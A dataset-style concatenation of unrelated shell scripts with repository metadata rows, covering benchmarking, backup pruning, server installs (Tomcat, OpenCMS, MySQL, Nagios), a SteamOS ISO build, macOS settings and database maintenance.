mkdir $3/QE
fi
LOG_FILE=$4
# Append one timestamped entry to $LOG_FILE as "<date> : <script> : <message>".
# The $(date) expansion is deliberately unquoted, matching the historic
# output format (runs of whitespace in the date collapse to single spaces).
function log () {
	echo $(date) : "$0" : "$1" >> "$LOG_FILE"
}
# Named graphs queried for each workload entry.
GRAPHS='http://ops.rsc.org
http://www.conceptwiki.org
http://www.ebi.ac.uk/chembl
http://linkedlifedata.com/resource/drugbank'
# One workload line = TYPE INPUT-URI LENS PAGE-SIZE; given the template names
# below, C appears to mean compound and T target.  '#' lines are filtered out
# by the grep feeding this loop.
while read TYPE INPUT LENS LIMIT
do
# Resolve mappings for the input URI; the helper also leaves
# .from_clause.tmp / .prop_path.tmp behind as a side channel.
XML=`./getMappingsForURI.sh $INPUT $LENS $2 $3/QE/ $4`
log "getMappingsForUri.sh response:"
log "$XML"
log "End getMappingsForUri.sh response."
FROM_CLAUSE=`cat .from_clause.tmp`
PROP_PATH=`cat .prop_path.tmp`
# Instantiate the SPARQL template for this entry type.  NOTE: the embedded
# newline after $FROM_CLAUSE is intentional -- it is part of the sed script.
if [ "$TYPE" == "C" ]
then
QUERY=`sed -e "s,FROM_CLAUSE,$FROM_CLAUSE
," -e "s,PROP_PATH,$PROP_PATH," -e "s,PAGE_SIZE,$LIMIT," ../../queries/QE/compoundPharma.sparql`
elif [ "$TYPE" == "T" ]
then
QUERY=`sed -e "s,FROM_CLAUSE,$FROM_CLAUSE
," -e "s,PROP_PATH,$PROP_PATH," -e "s,PAGE_SIZE,$LIMIT," ../../queries/QE/targetPharma.sparql`
else
echo "ERROR: Unknown instance type: $TYPE"
exit
fi
# Per graph: record mapping counts/URIs, then splice the URIs into the query.
for graph in $GRAPHS
do
URIS=`echo "$XML" | grep "$graph" -A 1 | sed -n 's,.*<binding name="uri"><uri>\(.*\)</uri></binding>,\1,p'`
if [ -z "$URIS" ]
then
echo 0 >> $3/QE/mappings_count_`echo $graph | sed -e 's,http://,,' -e 's,/,_,g'`.txt
echo NULL >> $3/QE/mappings_URIs_`echo $graph | sed -e 's,http://,,' -e 's,/,_,g'`.txt
QUERY=`echo "$QUERY" | sed "s,GRAPH_${graph}_VALUES,'No mappings found',"`
else
echo "$URIS" | wc -l >> $3/QE/mappings_count_`echo $graph | sed -e 's,http://,,' -e 's,/,_,g'`.txt
echo `echo "$URIS" | tr '\n' ' '` >> $3/QE/mappings_URIs_`echo $graph | sed -e 's,http://,,' -e 's,/,_,g'`.txt
RDF_URIS=`echo "$URIS" | sed -e 's,^ *,<,' -e 's, *$,>,' | tr '\n' ' '`
QUERY=`echo "$QUERY" | sed "s,GRAPH_${graph}_VALUES,$RDF_URIS,"`
fi
done
log "CONSTRUCT query:"
log "$QUERY"
log "End construct query"
# Run the query; curl's wall-clock time (per TIMEFORMAT) goes to the timing file.
RDF=$({ time curl --data-urlencode "query=$QUERY" "$2" 2>/dev/null ; } 2>> $3/QE/response_times_pharmacology.txt)
log "RDF response received"
log "$RDF"
log "End RDF response"
# Count returned triples by parsing rapper's "... returned N triples" summary.
rapper -c -i guess - base <<< "$RDF" 2>&1 | grep returned | sed 's,.* \([0-9][0-9]*\) .*,\1,' >> $3/QE/triple_count_pharmacology.txt
done < <(grep -v "^#" $1)
rm .*.tmp
| true |
ddd4bef7c2d943fc04b0b8aeb48faf046f3439c3 | Shell | xa4ypiva/TM | /tm_rm_weekly | UTF-8 | 402 | 3.21875 | 3 | [] | no_license | #!/bin/bash
# FindOldFolders DIR
# Print (space-separated, DIR-prefixed) the oldest version-sorted entries
# of DIR, i.e. the ones due for deletion after keeping the newest
# $dirsRemainNum (a global set by the caller).  Prints an empty line when
# nothing is due.
function FindOldFolders() {
    local dir=$1
    local -a folders=()
    local name
    # Read entries one per line so names are not word-split or globbed
    # (the original expanded an unquoted array, which breaks on unusual names).
    while IFS= read -r name; do
        folders+=("$dir/$name")
    done < <(ls "$dir" | sort -V | grep '[0-9-]')
    local dirsNum=${#folders[@]}
    local dirsRemoveNum=0
    if [ "$dirsNum" -gt "$dirsRemainNum" ]; then
        dirsRemoveNum=$((dirsNum - dirsRemainNum))
    fi
    echo "${folders[@]:0:$dirsRemoveNum}"
}
# Weekly prune: keep only the newest $dirsRemainNum dated backup folders
# in each backup subtree and delete the rest.
dst='/mnt/mSATA/data/backups'
dirsRemainNum=7
# The command substitutions are intentionally unquoted: the function prints a
# space-separated list; safe only because the folder names are dates with no
# whitespace.
rm -rf $(FindOldFolders $dst/home)
rm -rf $(FindOldFolders $dst/root)
| true |
8504ddb2f91bdc4b403d747cc46b332d2470184f | Shell | isao/shell | /misc/setmodes.sh | UTF-8 | 574 | 4.0625 | 4 | [] | no_license | #!/bin/sh
# permissions to apply: X flips executable bits on dirs only
mode='ug=rwX,o='
#input: $1 = ownership spec (user:group); the remaining arguments are paths.
# Paths stay in "$@" rather than a scalar: the old `paths=$@` collapsed them
# into one string and later re-split it on whitespace, which broke any path
# containing spaces.
owners=$1
shift
#usage: print usage + error message to stderr and exit with the given code
abort()
{
cat <<USAGE >&2
usage: $(basename "$0") <ownership> <path1> [... <path2>...]
description: recursively set user/group ownership and permissions
error: $1
USAGE
exit $2
}
#checks -- plain [ ] instead of [[ ]]: the shebang is /bin/sh, and [[ ]] is a
#bashism that strict POSIX shells do not provide
[ -z "$owners" ] && abort 'missing ownership parameter, like "root:b2user"' 1
[ $# -eq 0 ] && abort 'missing path parameter(s)' 2
for i in "$@"
do
[ ! -w "$i" ] && abort "can't write to $i" 3
done
#do it: operate on "$@" directly so paths with spaces survive intact
chown -R "$owners" "$@"
chmod -R "$mode" "$@"
| true |
ba8bba7652dc06ebedb54764e6aab486441118bc | Shell | CleyFaye/daocmapp | /MAPPER_M/MAPALL.SH | UTF-8 | 1,303 | 3.234375 | 3 | [
"BSD-3-Clause"
] | permissive | #!/bin/sh
# This is what I use to generate the maps on my website
# (see http://www.randomly.org/projects/mapper).
# Placed in the public domain.
# Oliver Jowett <oliver@randomly.org> 28/10/2002
#for jeux in camelot Shrouded_Isles; do
#jeux=Shrouded_Isles
# Game selection and input paths (Windows-style paths into the DAoC client data).
jeux=Camelot
source=d:\\mythic\\$jeux
bindir=.
font=.\\6x12-ISO8859-1.pil
set -e
mkdir -p out work
#~ rm -f polys/*.*
# Zone lists per region code; presumably the codes map to the three realms
# and their expansion/housing variants -- TODO confirm against zonelist.py.
zonesA=`python zonelist.py -gamepath $source -region 001 -simple`
zonesM=`python zonelist.py -gamepath $source -region 100 -simple`
zonesH=`python zonelist.py -gamepath $source -region 200 -simple`
zonesSIA=`python zonelist.py -gamepath $source -region 051 -simple`
zonesSIM=`python zonelist.py -gamepath $source -region 151 -simple`
zonesSIH=`python zonelist.py -gamepath $source -region 181 -simple`
zonesHA=`python zonelist.py -gamepath $source -region 002 -simple`
zonesHM=`python zonelist.py -gamepath $source -region 102 -simple`
zonesHH=`python zonelist.py -gamepath $source -region 202 -simple`
# Render every zone individually...
for z in $zonesHA $zonesHM $zonesHH $zonesSIA $zonesSIM $zonesSIH $zonesA $zonesM $zonesH
do
./2z.bat ${z}
./1z.bat ${z}
done
# ...then glue the per-zone images into one region image + HTML imagemap.
for z in 002 102 202 051 151 181 001 100 200
do
python glue.py -gamepath $source -out work\\region${z}.png -scale 10 -fontpath $font -template work\\map%03d_o.png -region $z >out/region$z.imagemap
done | true |
c07e6aa9c41860ff27b934e95c1f36e602c449e3 | Shell | danmichaelo/dotfiles | /scripts/openssl_get_site_certificate.sh | UTF-8 | 465 | 2.921875 | 3 | [] | no_license | #!/usr/bin/env bash
# ----------------------------------------------------------------------------
# Unofficial Bash Strict Mode
# http://redsymbol.net/articles/unofficial-bash-strict-mode/
set -euo pipefail
IFS=$'\n\t'
# ----------------------------------------------------------------------------
# Usage: openssl_get_site_certificate.sh {domain}
# Connects to https://{domain} (with SNI) and prints the server's leaf
# certificate as PEM.  The explicit argument check gives a readable usage
# message instead of set -u's cryptic "unbound variable" abort.
if [ "$#" -ne 1 ]; then
	echo "Usage: $(basename "$0") {domain}" >&2
	exit 2
fi
openssl s_client -connect "$1":443 -servername "$1" -showcerts </dev/null 2>/dev/null | openssl x509 -outform PEM
| true |
14d64887b43ed026a065116d9ec834ad0af2602d | Shell | nuclearglow/dotfiles | /linux/.razer/razer_status_code.zsh | UTF-8 | 1,397 | 3.546875 | 4 | [] | no_license | #!/usr/bin/env zsh
# * requires: https://github.com/openrazer
# * docs: https://github.com/openrazer/openrazer/wiki/Using-the-mouse-driver
# * inspired by: https://github.com/michaelmcallister/razer-status-code/blob/master/razer-mouse-status.plugin.zsh
# switch off the logo
# Writing to the logo_matrix_effect_none node of every attached Razer mouse
# disables the logo LED effect (openrazer sysfs interface).
for file in /sys/bus/hid/drivers/razermouse/*/logo_matrix_effect_none; do
    echo -n -e "off" > $file
done
# set the brightness (0-255)
_set_brightness() {
    # Push the requested scroll-wheel LED brightness (0-255) to every
    # attached Razer mouse exposed by the openrazer sysfs driver.
    local node
    for node in /sys/bus/hid/drivers/razermouse/*/scroll_led_brightness; do
        echo -n -e "$1" > "$node"
    done
}
# set a color to the razer mouse (use the local vars)
_set_color() {
    # Write the three \xHH-escaped RGB bytes in "$1" to the static-color
    # sysfs node of every attached Razer mouse; `echo -n -e` expands the
    # escapes into the raw bytes the driver expects.
    local node
    for node in /sys/bus/hid/drivers/razermouse/*/scroll_matrix_effect_static; do
        echo -n -e "$1" > "$node"
    done
}
# custom colors (write 3 bytes)
# Each value is three \xHH-escaped bytes (R, G, B); they are expanded into
# raw bytes by the echo -e inside _set_color.
local GREEN='\x00\xA9\x00'
local ORANGE='\xFF\x55\x00'
local RED='\xCC\x00\x00'
# get the exit status, set the color and brightness
# Registered as a zsh precmd below, so it runs after every command and colors
# the scroll wheel by the last exit status:
#   0 -> dim green, 1 -> orange, 127 / -1 -> bright red, anything else -> orange.
razer_mouse_status_code() {
    # use $1 when given, otherwise the last command's status
    # ('print -P %?' is zsh prompt expansion for $?)
    local exit_status="${1:-$(print -P %?)}";
    case $exit_status in
        0)
            _set_brightness 50
            _set_color $GREEN
            ;;
        1)
            _set_brightness 255
            _set_color $ORANGE
            ;;
        127)
            # command not found
            _set_brightness 255
            _set_color $RED
            ;;
        -1)
            _set_brightness 255
            _set_color $RED
            ;;
        *)
            _set_brightness 100
            _set_color $ORANGE
            ;;
    esac
}
# set as zsh precmd
precmd_functions+=(razer_mouse_status_code)
| true |
fca84d9898249fb012718f0b768239785c72f0ab | Shell | esprite/steamos-installer | /gen.sh | UTF-8 | 4,355 | 3.65625 | 4 | [] | no_license | #!/bin/sh
# Build configuration: everything is staged under $BUILD and packed into $ISONAME.
BUILD=./buildroot
APTCONF=./ftparchive/apt-ftparchive.conf
APTUDEBCONF=./ftparchive/apt-ftparchive-udeb.conf
CACHEDIR=./cache
DISTNAME=alchemist
ISOPATH="."
ISONAME="yeolde.iso"
#Check dependencies
deps="apt-utils xorriso syslinux rsync wget unzip"
for dep in ${deps}; do
if dpkg-query -s ${dep} >/dev/null 2>&1; then
:
else
echo "Missing dependency: ${dep}"
echo "Install with: sudo apt-get install ${dep}"
exit 1
fi
done
#Make sure our BUILD dir exists
if [ ! -d ${BUILD} ]; then
mkdir -p ${BUILD}
fi
#Download SteamOSInstaller.zip
#(wget -N only re-downloads when the server copy is newer)
steaminstallfile="SteamOSInstaller.zip"
steaminstallerurl="http://repo.steampowered.com/download/${steaminstallfile}"
if [ ! -f ${steaminstallfile} ]; then
echo "Downloading ${steaminstallerurl} ..."
if wget -N ${steaminstallerurl}; then
:
else
echo "Error downloading ${steaminstallerurl}!"
exit 1
fi
else
echo "Using existing ${steaminstallfile}"
fi
#Unzip SteamOSInstaller.zip into BUILD
#(-u: only extract entries newer than what is already unpacked)
if unzip -u ${steaminstallfile} -d ${BUILD}; then
:
else
echo "Error unzipping ${steaminstallfile} into ${BUILD}!"
exit 1
fi
#Delete 32-bit udebs and d-i, as SteamOS is 64-bit only
#TODO: delete entirely needless binary packages too, maybe we can fit on a CD
echo "Deleting 32-bit garbage from ${BUILD}..."
find ${BUILD} -name "*_i386.udeb" -type f -exec rm -rf {} \;
#Keep the i386 debs that amd64 multiarch still needs (GL / driver stack).
find ${BUILD} -name "*_i386.deb" | egrep -v "(\/eglibc\/|\/elfutils\/|\/expat\/|\/fglrx-driver\/|\/gcc-4.7\/|\/libdrm\/|\/libffi\/|\/libpciaccess\/|\/libvdpau\/|\/libx11\/|\/libxau\/|\/libxcb\/|\/libxdamage\/|\/libxdmcp\/|\/libxext\/|\/libxfixes\/|\/libxxf86vm\/|\/llvm-toolchain-3.3\/|\/mesa\/|\/nvidia-graphics-drivers\/|\/s2tc\/|\/zlib\/)" | xargs rm -f
rm -fr "${BUILD}/install.386"
#Bug fix: the glob must stay OUTSIDE the quotes -- quoting the whole path made
#the '*' literal, so the per-dist binary-i386 directories were never removed.
rm -fr "${BUILD}"/dists/*/main/debian-installer/binary-i386/
#Copy over updated and added debs
#First remove uneeded debs (superseded by the versions shipped in ./pool)
debstoremove="pool/non-free/f/firmware-nonfree/firmware-linux-nonfree_0.36+wheezy.1+bsos12_all.deb pool/non-free/f/firmware-nonfree/firmware-realtek_0.36+wheezy.1+bsos12_all.deb pool/main/d/debootstrap/debootstrap_1.0.54.steamos+bsos6_all.deb pool/main/d/debootstrap/debootstrap-udeb_1.0.54.steamos+bsos6_all.udeb"
for debremove in ${debstoremove}; do
if [ -f ${BUILD}/${debremove} ]; then
echo "Removing ${BUILD}/${debremove}..."
rm -fr "${BUILD}/${debremove}"
fi
done
#Delete all firmware from /firmware/ (re-populated via symlinks below)
echo "Removing bundled firmware"
rm -f ${BUILD}/firmware/*
#Rsync over our local pool dir
pooldir="./pool"
echo "Copying ${pooldir} into ${BUILD}..."
if rsync -av ${pooldir} ${BUILD}; then
:
else
echo "Error copying ${pooldir} to ${BUILD}"
exit 1
fi
#Symlink all firmware (one relative link per path listed in firmware.txt)
for firmware in `cat firmware.txt`; do
echo "Symlinking ${firmware} into /firmware/ folder"
ln -s ../${firmware} ${BUILD}/firmware/`basename ${firmware}`
done
#Copy over the rest of our modified files
yeoldfiles="poweruser.preseed boot isolinux post_install.sh"
for file in ${yeoldfiles}; do
echo "Copying ${file} into ${BUILD}"
cp -pfr ${file} ${BUILD}
done
#Generate default.preseed (poweruser.preseed + the default.stub additions)
echo "Generating default.preseed"
cp -pfr ${BUILD}/poweruser.preseed ${BUILD}/default.preseed
cat default.stub >> ${BUILD}/default.preseed
#Generate our new repos
echo "Generating Packages.."
mkdir -p ${CACHEDIR}
apt-ftparchive generate ${APTCONF}
apt-ftparchive generate ${APTUDEBCONF}
apt-ftparchive -c ${APTCONF} release ${BUILD}/dists/${DISTNAME} > ${BUILD}/dists/${DISTNAME}/Release
#Replace testing with alchemist (keep both dist names pointing at same content)
echo "Replacing ${BUILD}/dists/testing"
if [ -d ${BUILD}/dists/testing ]; then
rm -fr "${BUILD}/dists/testing"
cp -a ${BUILD}/dists/alchemist ${BUILD}/dists/testing
fi
#gpg --default-key "0E1FAD0C" --output $BUILD/dists/$DISTNAME/Release.gpg -ba $BUILD/dists/$DISTNAME/Release
#Checksum manifest over the whole tree (paths must be relative, hence the cd)
cd ${BUILD}
find . -type f -print0 | xargs -0 md5sum > md5sum.txt
cd -
#Remove old iso
if [ -f ${ISOPATH}/${ISONAME} ]; then
rm -f "${ISOPATH}/${ISONAME}"
fi
#Build a BIOS+UEFI hybrid bootable image from the staged tree.
echo "Building ${ISOPATH}/${ISONAME} ..."
xorriso -as mkisofs -r -checksum_algorithm_iso md5,sha1,sha256,sha512 \
	-V 'YeOldeSteamOSe 2013-12-19 Beta2' -o ${ISOPATH}/${ISONAME} \
	-J -isohybrid-mbr /usr/lib/syslinux/isohdpfx.bin \
	-joliet-long -b isolinux/isolinux.bin \
	-c isolinux/boot.cat -no-emul-boot -boot-load-size 4 \
	-boot-info-table -eltorito-alt-boot -e boot/grub/efi.img \
	-no-emul-boot -isohybrid-gpt-basdat -isohybrid-apm-hfsplus ${BUILD}
| true |
3ba3da81d9843cc295bddc6b9f88ccd5a540df66 | Shell | taylon/dotfiles | /setup_scripts/macos/system_settings | UTF-8 | 2,773 | 2.9375 | 3 | [] | no_license | #!/usr/bin/env bash
# Setup MacOS's NightShift
# Remove system shortcuts that will be used for something else:
# - Mission Control > Move Left/Right a space - ^left/right
# - Mission Control > Mission Control - ^up
# - Mission Control > Application Windows - ^down
# - Spotlight > Show Spotlight Search - cmd-space
# - Spotlight > Show Finder search window - option-cmd-space
# NOTE(review): most of these defaults only take effect after the relevant
# process restarts (killall Dock/Finder/SystemUIServer) or re-login -- confirm.
defaults write org.vim.MacVim AppleFontSmoothing -int 0
# Avoid creating .DS_Store files on network volumes
defaults write com.apple.desktopservices DSDontWriteNetworkStores -bool true
# Save screenshots to the Downloads folder
# NOTE(review): the directory is created as .../downloads/Screenshots but the
# capture location is set to .../downloads/screenshots; this only lines up on
# a case-insensitive filesystem (the APFS default) -- confirm intended path.
mkdir "$HOME"/downloads/Screenshots
defaults write com.apple.screencapture location -string "$HOME/downloads/screenshots"
# Ask for password immediately after lock
defaults write com.apple.screensaver askForPassword -int 1
defaults write com.apple.screensaver askForPasswordDelay -int 0
# Expand save panel by default
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode -bool true
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode2 -bool true
# Don’t automatically rearrange Spaces based on most recent use
defaults write com.apple.dock mru-spaces -bool false
# Keyboard: Disable press-and-hold for keys in favor of key repeat
defaults write NSGlobalDomain ApplePressAndHoldEnabled -bool false
# Set fast keyboard repeat rate
defaults write NSGlobalDomain KeyRepeat -int 2
defaults write NSGlobalDomain InitialKeyRepeat -int 15
# Menu bar: Set preferred date format
defaults write com.apple.menuextra.clock DateFormat -string "EEE d MMM HH:mm"
# Menu bar: Enable desired icons
defaults write com.apple.systemuiserver "NSStatusItem Visible com.apple.menuextra.volume" -int 1
defaults write com.apple.systemuiserver "NSStatusItem Visible com.apple.menuextra.clock" -int 1
defaults write com.apple.systemuiserver "NSStatusItem Visible com.apple.menuextra.battery" -int 1
defaults write com.apple.systemuiserver menuExtras -array \
	"/System/Library/CoreServices/Menu Extras/Battery.menu" \
	"/System/Library/CoreServices/Menu Extras/Clock.menu" \
	"/System/Library/CoreServices/Menu Extras/Volume.menu"
# Finder: Show hidden files by default
defaults write com.apple.Finder AppleShowAllFiles -bool true
# Finder: show all filename extensions
defaults write NSGlobalDomain AppleShowAllExtensions -bool true
# Finder: Set programming as the default location for new Finder windows
defaults write com.apple.finder NewWindowTarget -string "PfLo"
defaults write com.apple.finder NewWindowTargetPath -string "file://$HOME/programming/"
# Dock: Automatically hide and show the Dock
defaults write com.apple.dock autohide -bool true
# Dock: Set Auto Show/Hide Delay
defaults write com.apple.Dock autohide-delay -float 0
| true |
7116c0634a777972cd275475ab7e6d14610bf9fa | Shell | shiva554/mysql_opentsdb_pusher | /src/deb/files/usr/bin/cox-pnh-brix_tsdb-puller-script.sh | UTF-8 | 851 | 3.421875 | 3 | [] | no_license | #!/bin/sh
############################################################
#Description : Script to copy data from Oracle to PNH
#Date : 01242018
#Author : Shiva Lokasani
#Frequency : Every 5 minutes
#Modification : Initial
#############################################################
LOGFILE=/var/log/cox-pnh-brix_tsdb-service.log
DATADIR=/var/cox/pnh/incoming
BRIXDIR=/var/cox/pnh
USERNAME=brix
SERVER=184.176.220.70
# NOTE: captured once at startup, so every log line of a run carries the same
# timestamp.
DATE=`date`
# Single all-or-nothing pipeline: run the remote extract, copy the produced
# files here, then delete them on the Brix server.  If any step fails, the
# fallback subshell logs "Process failed" and the script exits non-zero.
(echo "${DATE} Running bxextract on "${SERVER} >> $LOGFILE && \
ssh -t ${USERNAME}@${SERVER} '/usr/bin/cox-pnh-data-collection-script.sh' && \
echo "${DATE} Fetching files" >> $LOGFILE && \
scp ${USERNAME}@${SERVER}:${BRIXDIR}/* ${DATADIR}/. && \
echo "${DATE} Removing files from Brix server" >> $LOGFILE && \
ssh ${USERNAME}@${SERVER} 'rm '${BRIXDIR}'/*' ) || ( echo "Process failed" >> $LOGFILE && exit 1)
| true |
02d981e7bde052bf469a26092fd5937bcff92e42 | Shell | ro6i/homeconf | /.config/bash/keyring-unlock.sh | UTF-8 | 147 | 3.140625 | 3 | [] | no_license |
# Prompt for the login password and use it to restart + unlock the GNOME
# keyring daemon, exporting the environment variables the daemon prints
# (one VAR=value per line) into the current shell.
function keyring-unlock() {
  local _pass
  read -rsp "Password: " _pass
  # printf replaces `echo -n`: echo mangles passwords that begin with
  # -n/-e or contain backslash sequences.  The command substitution is
  # intentionally unquoted so each VAR=value line the daemon emits becomes
  # a separate argument to export.
  export $(printf '%s' "$_pass" | gnome-keyring-daemon --replace --unlock)
  unset _pass
}
| true |
7d50363f1bc587bf90d78d19d5e69b61a132aed6 | Shell | Ianfernandez09/ProyectoVagrant | /instala_todo.sh | UTF-8 | 4,438 | 3.046875 | 3 | [] | no_license | #Instala jdk
# Provision a CentOS/RHEL 8 host with Tomcat 9 behind an httpd reverse
# proxy plus MySQL, then deploy OpenCMS 11 as the ROOT webapp.
# NOTE: configuration files are now written with `sudo tee` heredocs.  The
# original used `sudo echo ... > file`, which fails for unprivileged callers
# because the shell performs the redirection *before* sudo runs; it also had
# one line missing its redirect entirely and one appended to a mistyped
# filename (tomcat_manager.com) -- both fixed below.
sudo yum -y install java-11-openjdk-devel
# wget, httpd, unzip, mysql
sudo yum -y install wget
sudo yum -y install httpd
sudo yum -y install unzip
sudo dnf install mysql-server -y
# Download Tomcat 9
sudo wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.40/bin/apache-tomcat-9.0.40.tar.gz
# Dedicated tomcat user/group (no login shell)
sudo groupadd --system tomcat
sudo useradd -d /usr/share/tomcat -r -s /bin/false -g tomcat tomcat
# Unpack and point the /usr/share/tomcat symlink at this version
sudo tar xvf apache-tomcat-9.0.40.tar.gz -C /usr/share/
sudo ln -s /usr/share/apache-tomcat-9.0.40/ /usr/share/tomcat
sudo chown -R tomcat:tomcat /usr/share/tomcat
sudo chown -R tomcat:tomcat /usr/share/apache-tomcat-9.0.40/
# systemd unit for Tomcat (single atomic privileged write)
sudo tee /etc/systemd/system/tomcat.service >/dev/null <<'EOF'
[Unit]
Description=Tomcat Server
After=syslog.target network.target

[Service]
Type=forking
User=tomcat
Group=tomcat

Environment=JAVA_HOME=/usr/lib/jvm/jre
Environment='JAVA_OPTS=-Djava.awt.headless=true'
Environment=CATALINA_HOME=/usr/share/tomcat
Environment=CATALINA_BASE=/usr/share/tomcat
Environment=CATALINA_PID=/usr/share/tomcat/temp/tomcat.pid
Environment='CATALINA_OPTS=-Xms512M -Xmx1024M'
ExecStart=/usr/share/tomcat/bin/catalina.sh start
ExecStop=/usr/share/tomcat/bin/catalina.sh stop

[Install]
WantedBy=multi-user.target
EOF
# Load the new unit and start Tomcat at boot
sudo systemctl daemon-reload
sudo systemctl start tomcat
sudo systemctl enable tomcat
# httpd as reverse proxy in front of Tomcat (bug fix: the ProxyPass line used
# to be appended to tomcat_manager.com -- note the typo -- so the mapping
# never reached the live configuration)
sudo tee /etc/httpd/conf.d/tomcat_manager.conf >/dev/null <<'EOF'
<VirtualHost *:80>
    ServerAdmin root@localhost
    ServerName tomcat.example.com
    DefaultType text/html
    ProxyRequests off
    ProxyPreserveHost On
    ProxyPass / http://localhost:8080/
    ProxyPassReverse / http://localhost:8080/
</VirtualHost>
EOF
# SELinux booleans so httpd may proxy to Tomcat
sudo setsebool -P httpd_can_network_connect 1
sudo setsebool -P httpd_can_network_relay 1
sudo setsebool -P httpd_graceful_shutdown 1
sudo setsebool -P nis_enabled 1
# Restart and enable httpd
sudo systemctl restart httpd && sudo systemctl enable httpd
# MySQL: start, enable, and create the OpenCMS schema + user
sudo systemctl start mysqld.service
sudo systemctl enable mysqld
sudo mysql -e "CREATE DATABASE opencms;"
sudo mysql -e "CREATE USER 'opencms'@'localhost' identified by 'opencms';"
sudo mysql -e "GRANT ALL PRIVILEGES ON opencms.* to 'opencms'@'localhost';"
sudo mysql -e "FLUSH PRIVILEGES;"
# Download OpenCMS and deploy it as the ROOT webapp
sudo wget http://www.opencms.org/downloads/opencms/opencms-11.0.2.zip
sudo unzip opencms-11.0.2.zip
sudo mv opencms.war /usr/share/tomcat/webapps/
sudo rm -r /usr/share/tomcat/webapps/ROOT
sudo mv /usr/share/tomcat/webapps/opencms.war /usr/share/tomcat/webapps/ROOT.war
# Restart Tomcat so the new war is exploded and served
sudo systemctl restart tomcat
| true |
552f2c64f02bd10a7d82122428f546007cd80892 | Shell | Band1to/OpenBazaar | /installers/ubuntu/DEBIAN/postinst | UTF-8 | 876 | 2.796875 | 3 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash
set -e
# Debian postinst: finish the OpenBazaar install by creating its Python
# virtualenv and wiring the distro-packaged jquery into the bundled web UI.
echo "[openbazaar] Installing OpenBazaar python dependencies..."
pushd /usr/share/openbazaar
sudo virtualenv env
sudo ./env/bin/pip install -r requirements.txt
popd
# Hand the tree to the invoking user so the app can run unprivileged.
sudo chmod -R 775 /usr/share/openbazaar
sudo chown -R $SUDO_USER:$SUDO_USER /usr/share/openbazaar
# Replace the bower-vendored jquery copies with symlinks to the packaged one.
# NOTE(review): ln -s fails (and, via set -e, aborts the postinst) when the
# links already exist, e.g. on reinstall -- consider ln -sf; confirm intent.
ln -s /usr/share/javascript/jquery/jquery.js /usr/share/openbazaar/html/bower_components/jquery/dist/jquery.js
ln -s /usr/share/javascript/jquery/jquery.js /usr/share/openbazaar/html/bower_components/jquery/src/jquery.js
ln -s /usr/share/javascript/jquery/jquery.min.js /usr/share/openbazaar/html/bower_components/jquery/dist/jquery.min.js
ln -s /usr/share/javascript/jquery/jquery.min.js /usr/share/openbazaar/html/vendors/jquery.min.js
echo
echo
echo
echo
echo "[openbazaar] Installation finished."
echo "[openbazaar] Now type 'openbazaar start' to start OpenBazaar."
echo
echo
echo
echo
| true |
83fef98145d448d2af0d1bcd126284b18483c9e0 | Shell | rjnn/tb | /alter-replica-identity.sh | UTF-8 | 1,010 | 3.90625 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
# y/n flag: when 'y', only print the psql commands instead of running them
DRY_RUN=n
# '_' is a sentinel meaning "database name not supplied yet"
DB=_
usage() {
  echo "usage: $0 [--dry-run] DB_NAME"
  exit
}
# For every table in the public schema of $DB, set REPLICA IDENTITY FULL
# (PostgreSQL then logs the entire old row for UPDATE/DELETE, which logical
# replication consumers need when no suitable key exists).  Each command is
# echoed first and executed only when DRY_RUN is 'n'.
main() {
  parse_args "$@"
  for tbl in $(psql -qAt -h localhost -d "$DB" -c "SELECT tablename FROM pg_tables WHERE schemaname = 'public';") ; do
    echo psql -h localhost -d "$DB" -c "ALTER TABLE \"$tbl\" REPLICA IDENTITY FULL" ;
    if [[ $DRY_RUN = n ]]; then
      psql -h localhost -d "$DB" -c "ALTER TABLE \"$tbl\" REPLICA IDENTITY FULL" ;
    fi
  done
}
# Parse command-line options into the DRY_RUN / DB globals.
# Understands --dry-run and -h/--help; the single remaining bare argument is
# taken as the database name.  A second bare argument, or a missing DB_NAME,
# triggers usage().
parse_args() {
  local token
  for token in "$@"; do
    case "$token" in
      --dry-run)
        DRY_RUN=y
        ;;
      -h|--help)
        usage
        ;;
      *)
        # the sentinel '_' marks DB as not-yet-assigned
        if [[ $DB == _ ]]; then
          DB=$token
        else
          usage
        fi
        ;;
    esac
  done
  if [[ $DB == _ ]]; then
    echo "Missing DB_NAME"
    usage
  fi
}
# Entry point: parse flags, then apply REPLICA IDENTITY FULL to every table.
main "$@"
| true |
fe672928390740d6d60dc825c19da38668ddddb8 | Shell | nagarameshreddy/scripts | /Nagios client.sh | UTF-8 | 574 | 3.046875 | 3 | [] | no_license | #! /bin/bash
#NRPE plugin installation script
# Installs the Nagios NRPE agent and standard plugins on a RHEL/CentOS
# host, then starts NRPE and enables it at boot.
# Bug fixed: the first prompt line was written `echo"NRPE ..."` (no space
# after echo), which bash parsed as an unknown command name instead of
# printing the message.
echo "NRPE plugin installation script from JAVAHOME"
echo "Run this script as root user or sudo"
echo "confirm that you are running with root user or sudo permissions(yes/no)"
read javahome
if [ "$javahome" = "yes" ]
then
	# Put SELinux in permissive mode so NRPE checks are not blocked, then
	# install the agent stack and register the service with init.
	setenforce 0
	yum install gcc glibc glibc-common gd gd-devel openssl openssl-devel net-snmp -y
	yum -y install xinetd
	yum install nagios-plugins-all nagios-plugins-nrpe nrpe -y
	service nrpe start
	chkconfig nrpe on
else
	echo "Run this script as root user or with sudo command"
fi
| true |
c5db380dfdb7c091c7766eb46c91df96a29ec0d0 | Shell | zhanzhengxiang/smartdevicelink | /SDL_Core/config.host | UTF-8 | 280 | 2.8125 | 3 | [] | no_license | #!/bin/bash
# Install host build dependencies (compiler toolchain, Bluetooth and
# OpenSSL headers, cmake; chromium-browser presumably for the HMI --
# confirm against the project docs).
function prepare_toolchain(){
sudo apt-get install build-essential chromium-browser libbluetooth-dev libssl-dev
sudo apt-get install cmake
}
function prepare_rootfs(){
    # Host builds run against the host filesystem directly, so there is
    # no root filesystem image to stage.
    printf '%s\n' 'Nothing to do for prepare_rootfs'
}
function configure_arguments(){
    # No extra CMake flags are required for a host build.
    CMAKE_CONFIGURE=''
}
| true |
e613ef1703e3aa0838a4de05a22f3be0f9447b09 | Shell | SurfingNerd/dmd-meta | /build-netherum-bindings-for-dmd-vision.sh | UTF-8 | 1,735 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/bin/sh
echo "compiling hbbft-posdao-contracts"
